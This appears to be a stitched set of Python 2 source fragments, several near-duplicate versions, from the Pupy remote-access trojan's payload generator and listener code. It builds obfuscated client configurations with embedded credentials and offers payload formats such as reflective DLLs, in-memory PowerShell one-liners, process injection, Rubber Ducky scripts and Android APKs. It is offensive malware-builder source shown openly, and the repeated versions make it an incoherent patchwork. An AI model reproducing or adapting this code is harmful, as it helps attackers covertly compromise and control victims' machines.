def get_raw_conf(conf, obfuscate=False): credentials = Credentials(role='client') if not "offline_script" in conf: offline_script = "" else: offline_script = conf["offline_script"] obf_func = lambda x: x if obfuscate: obf_func = compress_encode_obfs l = launchers[conf['launcher']]() l.parse_args(conf['launcher_args']) required_credentials = set(l.credentials) \ if hasattr(l, 'credentials') else set([]) transport = l.get_transport() transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) print colorize("[+] ", "red") + 'Required credentials:\n{}'.format( colorize("[+] ", "red") + ', '.join(required_credentials)) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({'pupy_credentials.py': embedded_credentials}))), '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr( cPickle.dumps( gen_package_pickled_dic( ROOT + os.sep, 'network.transports.{}'.format(transport))))) for transport in transports_list ]), 'import sys', 'sys.modules.pop("network.conf")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), offline_script ]) return obf_func(config)
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green") + " usage: -f <format>" print "\t- client : generate client binary" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- pyinst : generate a python file compatible with pyinstaller" print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line." print "\t- ps1 : generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process." print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell." print "\t- rubber_ducky : generate a Rubber Ducky script and inject.bin file (Windows Only)." print "" print colorize("## available transports :", "green") + " usage: -t <transport>" for name, tc in transports.iteritems(): try: print "\t- {:<14} : {}".format(name, tc.info) except Exception as e: logging.error(e) print colorize( "## available scriptlets :", "green") + " usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..." scriptlets_dic = load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t" + x for x in sc.get_help().split("\n")]) raise InvalidOptions
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green") + " usage: -f <format>" print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line." print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell." print "" print colorize("## available transports :", "green") + " usage: -t <transport>" for name, tc in transports.iteritems(): try: print "\t- {:<14} : {}".format(name, tc.info) except Exception as e: logging.error(e) print colorize( "## available scriptlets :", "green") + " usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..." scriptlets_dic = load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t" + x for x in sc.get_help().split("\n")]) exit()
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green")+" usage: -f <format>" print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- lin_x86, lin_x64 : generate a ELF binary for linux" print "\t- so_x86, so_x64 : generate a ELF .so for linux" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- pyinst : generate a python file compatible with pyinstaller" print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line." print "\t- ps1 : generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process." print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell." print "\t- rubber_ducky : generate a Rubber Ducky script and inject.bin file (Windows Only)." print "\t- apk : generate a apk for running pupy on android" print "" print colorize("## available transports :","green")+" usage: -t <transport>" for name, tc in transports.iteritems(): try: print "\t- {:<14} : {}".format(name, tc.info) except Exception as e: logging.error(e) print colorize("## available scriptlets :", "green")+" usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..." scriptlets_dic=load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t"+x for x in sc.get_help().split("\n")]) exit()
def do(server, handler, config, args): if args.add: name, args = args.add[0], args.add[1:] server.add_listener(name, ' '.join(args), motd=False) elif args.add_no_pproxy: name, args = args.add_no_pproxy[0], args.add_no_pproxy[1:] server.add_listener(name, ' '.join(args), motd=False, ignore_pproxy=True) elif args.remove: server.remove_listener(args.remove) elif args.list_transports: table = [] for name, transport in transports.iteritems(): color = None listener = None info = transport.info if name in server.listeners: color = 'lightgreen' listener = Color(str(server.listeners[name]), color) name = Color(name, color) info = Color(info, color) table.append({'NAME': name, 'INFO': info, 'ACTIVE': listener}) handler.display(Table(table, ['NAME', 'INFO', 'ACTIVE'])) else: for listener in server.listeners.itervalues(): handler.display(Success(listener))
def pupygen(args, config, pupsrv, display): scriptlets = load_scriptlets(args.os, args.arch) if args.list: display(MultiPart([ Table([{ 'FORMAT': f, 'DESCRIPTION': d } for f,d in { 'client': 'generate client binary (linux/windows/apk/..)', 'py': 'fully packaged python file', 'py_oneliner': 'same as \'py\' format but served over http', 'ps1': 'generate ps1 file which embeds pupy dll (x86-x64) and inject it to current process', 'ps1_oneliner': 'load pupy remotely from memory with a single command line using powershell', 'csharp': 'generate C# source (.cs) that executes pupy', '.NET': 'compile a C# payload into a windows executable.', '.NET_oneliner': 'Loads .NET assembly from memory via powershell' }.iteritems()], ['FORMAT', 'DESCRIPTION'], Color('Available formats (usage: -f <format>)', 'yellow')), Table([{ 'TRANSPORT': name, 'DESCRIPTION': t.info } for name, t in transports.iteritems()], ['TRANSPORT', 'DESCRIPTION'], Color('Available transports (usage: -t <transport>)', 'yellow')), Table([{ 'SCRIPTLET': name, 'DESCRIPTION': sc.description, 'ARGS': '; '.join( '{}={}'.format(k,v) for k,v in sc.arguments.iteritems() ) } for name, sc in scriptlets.iteritems()], ['SCRIPTLET', 'DESCRIPTION', 'ARGS'], Color( 'Available scriptlets for {}/{} ' '(usage: -s <scriptlet>[,arg1=value1,arg2=value2]'.format( args.os or 'any', args.arch or 'any'), 'yellow')) ])) raise NoOutput() if args.workdir: os.chdir(args.workdir) script_code="" try: if args.scriptlet: script_code = pack_scriptlets( display, scriptlets, args.scriptlet, os=args.os, arch=args.arch, debug=args.debug_scriptlets) except ValueError, e: display(Error(e.message)) raise NoOutput()
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green") print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- py_oneliner : same as \"py\" format but served over http to load it from a single command line" print "" print colorize("## available transports :","green") for name, dic in transports.iteritems(): print "\t- {:<20} : {}".format(name, dic["info"]) print "" print colorize("## available scriptlets :", "green") scriptlets_dic=load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t"+x for x in sc.get_help().split("\n")]) exit()
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green") print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- py_oneliner : same as \"py\" format but served over http to load it from a single command line" print "" print colorize("## available transports :", "green") for name, dic in transports.iteritems(): print "\t- {:<20} : {}".format(name, dic["info"]) print "" print colorize("## available scriptlets :", "green") scriptlets_dic = load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t" + x for x in sc.get_help().split("\n")]) exit()
def __call__(self, parser, namespace, values, option_string=None): print colorize("## available formats :", "green")+" usage: -f <format>" print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line." print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell." print "" print colorize("## available transports :","green")+" usage: -t <transport>" for name, tc in transports.iteritems(): try: print "\t- {:<14} : {}".format(name, tc.info) except Exception as e: logging.error(e) print colorize("## available scriptlets :", "green")+" usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..." scriptlets_dic=load_scriptlets() for name, sc in scriptlets_dic.iteritems(): print "\t- {:<15} : ".format(name) print '\n'.join(["\t"+x for x in sc.get_help().split("\n")]) exit()
MSG_TYPES_UNPACK = {} KNOWN_NAMED_TUPLES = (Proxy, ProxyInfo, HostInfo, TransportInfo) def register_named_tuple(code, type): MSG_TYPES_PACK[type] = lambda obj: Ext(code, packb(tuple(x for x in obj))) MSG_TYPES_UNPACK[code] = lambda obj: type(*unpackb(obj.data)) def register_string(type, code, name): MSG_TYPES_PACK[type] = lambda obj: Ext(code, '') MSG_TYPES_UNPACK[code] = lambda obj: name for idx, type in enumerate(KNOWN_NAMED_TUPLES): register_named_tuple(idx, type) SPECIAL_TYPES_OFFT = len(KNOWN_NAMED_TUPLES) for idx, (name, type) in enumerate(transports.iteritems()): register_string(idx, type, name) wrapext = namedtuple('Ext', ('code', 'data')) def msgpack_exthook(code, data): if code in MSG_TYPES_UNPACK: obj = wrapext(code, data) return MSG_TYPES_UNPACK[code](obj)
def get_raw_conf(conf, obfuscate=False, verbose=False): credentials = Credentials(role='client') if not "offline_script" in conf: offline_script="" else: offline_script=conf["offline_script"] obf_func=lambda x:x if obfuscate: obf_func=compress_encode_obfs l = launchers[conf['launcher']]() l.parse_args(conf['launcher_args']) required_credentials = set(l.credentials) \ if hasattr(l, 'credentials') else set([]) transport = l.get_transport() transports_list = [] if transport: transports_list = [ transport ] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) print colorize("[+] ", "green") + 'Required credentials:\n{}'.format( colorize("[+] ", "green") + ', '.join(required_credentials) ) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' if verbose: for k, v in conf.iteritems(): print colorize("[C] {}: {}".format(k, v), "yellow") config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({ 'pupy_credentials.py' : embedded_credentials }))), '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps(gen_package_pickled_dic( ROOT+os.sep, 'network.transports.{}'.format(transport) )))) for transport in transports_list ]), 'import sys', 'sys.modules.pop("network.conf")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), 'debug={}'.format(bool(conf.get('debug', False))), offline_script ]) return obf_func(config)
def get_raw_conf(conf, obfuscate=False, verbose=False): credentials = Credentials(role='client') if not "offline_script" in conf: offline_script="" else: offline_script=conf["offline_script"] obf_func=lambda x:x if obfuscate: obf_func=compress_encode_obfs launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.get_transport() transports_list = [] if transport: transports_list = [ transport ] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) print colorize("[+] ", "green") + 'Required credentials (found):\n{}'.format( colorize("[+] ", "green") + ', '.join(available)) if not_available: print colorize("[-] ", "red") + 'Required credentials (not found):\n{}'.format( colorize("[-] ", "red") + ', '.join(not_available)) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' if verbose: for k, v in conf.iteritems(): if k in ('offline_script'): continue print colorize("[C] {}: {}".format(k, v), "yellow") config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({ 'pupy_credentials.pye' : bytes(pupycompile(embedded_credentials, obfuscate=True)) }))), dependencies.importer(set( 'network.transports.{}'.format(transport) for transport in transports_list ), path=ROOT), 'import sys', 'sys.modules.pop("network.conf")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), 'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)), 'pupy.cid = CONFIGURATION_CID', 'debug={}'.format(bool(conf.get('debug', False))), offline_script ]) return obf_func(config)
def get_raw_conf(display, conf, obfuscate=False, verbose=False): credentials = Credentials(role='client') if "offline_script" not in conf: offline_script="" else: offline_script=conf["offline_script"] launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.get_transport() transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) display( List(available, bullet=Color('+', 'green'), caption=Success('Required credentials (found)'))) if not_available: display( List(not_available, bullet=Color('-', 'red'), caption=Error('Required credentials (not found)'))) embedded_credentials = '\n'.join([ '{}={}'.format(credential, repr(credentials[credential])) \ for credential in required_credentials if credentials[credential] is not None ])+'\n' if verbose: config_table = [{ 'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else ( unicode(v) if type(v) not in (tuple,list,set) else ' '.join( unicode(x) for x in v)) } for k,v in conf.iteritems() if v] display(Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1)) config = '\n'.join([ 'pupyimporter.pupy_add_package({})'.format( repr(cPickle.dumps({ 'pupy_credentials.pye': bytes(pupycompile(embedded_credentials, obfuscate=True)) }))), dependencies.importer(set( 'network.transports.{}'.format(transport) for transport in transports_list ), path=ROOT), 'import sys', 'sys.modules.pop("network.conf", "")', 'import network.conf', 'LAUNCHER={}'.format(repr(conf['launcher'])), 'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])), 'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)), 'DELAYS={}'.format(repr(conf.get('delays', [ (10, 5, 10), (50, 30, 50), (-1, 150, 300)]))), 'pupy.cid = CONFIGURATION_CID', 'debug={}'.format(bool(conf.get('debug', False))), 'SCRIPTLETS={}'.format(repr(offline_script) if offline_script else '""') ]) return compress_encode_obfs(config) if obfuscate else config
def get_raw_conf(display, conf, verbose=False): credentials = Credentials(role='client') if 'offline_script' not in conf: offline_script = '' else: offline_script = conf['offline_script'] launcher = launchers[conf['launcher']]() launcher.parse_args(conf['launcher_args']) required_credentials = set(launcher.credentials) \ if hasattr(launcher, 'credentials') else set([]) transport = launcher.transport transports_list = [] if transport: transports_list = [transport] if transports[transport].credentials: for name in transports[transport].credentials: required_credentials.add(name) elif not transport: for n, t in transports.iteritems(): transports_list.append(n) if t.credentials: for name in t.credentials: required_credentials.add(name) available = [] not_available = [] for cred in required_credentials: if credentials[cred]: available.append(cred) else: not_available.append(cred) display( List(available, bullet=Color('+', 'green'), caption=Success('Required credentials (found)'))) if not_available: display( List(not_available, bullet=Color('-', 'red'), caption=Error('Required credentials (not found)'))) embedded_credentials = { credential: credentials[credential] for credential in required_credentials if credentials[credential] is not None } if verbose: config_table = [{ 'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else (unicode(v) if type(v) not in (tuple, list, set) else ' '.join( unicode(x) for x in v)) } for k, v in conf.iteritems() if v] display( Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1)) config = { 'credentials': embedded_credentials, 'scriptlets': [offline_script] or [], 'debug': conf.get('debug', False), 'launcher': conf['launcher'], 'launcher_args': conf['launcher_args'], 'cid': conf.get('cid', 0x31338), 'delays': conf.get('delays', [(10, 5, 10), (50, 30, 50), (-1, 150, 300)]) } return config